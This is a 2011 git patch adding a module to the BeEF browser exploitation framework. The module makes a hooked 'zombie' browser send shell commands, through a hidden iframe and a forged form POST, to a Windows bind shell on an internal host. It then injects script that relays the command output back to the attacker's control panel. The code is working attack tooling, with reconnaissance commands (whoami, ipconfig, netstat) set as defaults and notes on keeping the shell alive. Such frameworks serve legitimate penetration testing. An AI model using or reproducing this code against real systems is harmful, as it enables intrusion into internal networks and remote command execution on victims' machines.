From bf9e304acea62fc3a55584459cd0c303fff5fb92 Mon Sep 17 00:00:00 2001
From: "bcoles@gmail.com"
 <bcoles@gmail.com@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Fri, 12 Aug 2011 09:00:34 +0000
Subject: [PATCH] Added module: Inter-Protocol Windows Bindshell

This is part of issue# 7



git-svn-id: https://beef.googlecode.com/svn/trunk@1186 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../inter_protocol_win_bindshell/command.js   | 88 +++++++++++++++++++
 .../inter_protocol_win_bindshell/config.yaml  | 26 ++++++
 .../inter_protocol_win_bindshell/module.rb    | 80 +++++++++++++++++
 3 files changed, 194 insertions(+)
 create mode 100644 modules/network/inter_protocol_win_bindshell/command.js
 create mode 100644 modules/network/inter_protocol_win_bindshell/config.yaml
 create mode 100644 modules/network/inter_protocol_win_bindshell/module.rb

diff --git a/modules/network/inter_protocol_win_bindshell/command.js b/modules/network/inter_protocol_win_bindshell/command.js
new file mode 100644
index 000000000..2401e9a1b
--- /dev/null
+++ b/modules/network/inter_protocol_win_bindshell/command.js
@@ -0,0 +1,88 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var target_ip = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var cmd = "<%= @cmd %>";
+	var command_timeout = "<%= @command_timeout %>";
+	var internal_counter = 0;
+
+	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
+
+	var iframe = document.createElement("iframe");
+	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
+	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+	document.body.appendChild(iframe);
+
+	function do_submit(ip, port, content) {
+
+		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
+		var parent = window.location.href;
+
+		myform=document.createElement("form");
+		myform.setAttribute("name","data");
+		myform.setAttribute("method","post");
+		myform.setAttribute("enctype","multipart/form-data");
+		myform.setAttribute("action",action);
+		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
+	
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id",<%= @command_id %>);
+		myExt.setAttribute("name",<%= @command_id %>);
+		myExt.setAttribute("value",content);
+		myform.appendChild(myExt);
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id","endTag");
+		myExt.setAttribute("name","</div>");
+		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
+
+		myform.appendChild(myExt);
+		myform.submit();
+	}
+
+	function waituntilok() {
+
+		try {
+			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
+				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
+				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
+				document.body.removeChild(iframe);
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+			internal_counter++;
+			if (internal_counter > command_timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=time out');
+				document.body.removeChild(iframe);
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	if (!target_port || !target_ip || isNaN(target_port)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
+	} else if (target_port > 65535 || target_port < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+	} else {
+		do_submit(target_ip, target_port, cmd);
+		waituntilok();
+	}
+
+});
+
diff --git a/modules/network/inter_protocol_win_bindshell/config.yaml b/modules/network/inter_protocol_win_bindshell/config.yaml
new file mode 100644
index 000000000..4eae87284
--- /dev/null
+++ b/modules/network/inter_protocol_win_bindshell/config.yaml
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        inter_protocol_win_bindshell:
+            enable: true
+            category: "Network"
+            name: "Inter-Protocol Windows Bindshell"
+            description: "Using <a href='http://www.bindshell.net/papers/ipc'>Inter-protocol Communication</a> the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.<br><br>The command results are returned to the BeEF control panel."
+            authors: ["bcoles", "wade"]
+            target:
+                working: ["FF"]
+                not_working: ["C", "S", "O", "IE"]
diff --git a/modules/network/inter_protocol_win_bindshell/module.rb b/modules/network/inter_protocol_win_bindshell/module.rb
new file mode 100644
index 000000000..0ef7dcc8d
--- /dev/null
+++ b/modules/network/inter_protocol_win_bindshell/module.rb
@@ -0,0 +1,80 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+=begin
+[+] Summary:
+
+Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
+
+The command results are returned to the BeEF control panel.
+
+[+] Tested:
+
+o Working:
+	o Mozilla Firefox 4
+	o Mozilla Firefox 5
+
+o Not Working:
+	o Mozilla Firefox 5 with the NoScript extension
+	o Internet Explorer 8+
+	o Chrome 13
+	o Opera 11
+	o Safari 5
+
+[+] Notes:
+
+o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
+
+	o use the netcat persistent listen "-L" option rather than the listen "-l" option; or
+
+	o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
+
+o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
+
+	[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7}
+	SYSTEM rule:
+	Site LOCAL
+	Accept from LOCAL
+	Deny
+
+o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
+
+o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
+
+o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
+
+=end
+
+class Inter_protocol_win_bindshell < BeEF::Core::Command
+  
+  def self.options
+    return [
+	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
+	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
+	{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
+	{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
+    ]
+  end
+
+  def callback
+    content = {}
+    content['result'] = @datastore['result'] if not @datastore['result'].nil?
+    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
+    if content.empty?
+      content['fail'] = 'No data was returned.'
+    end
+    save content
+  end
+end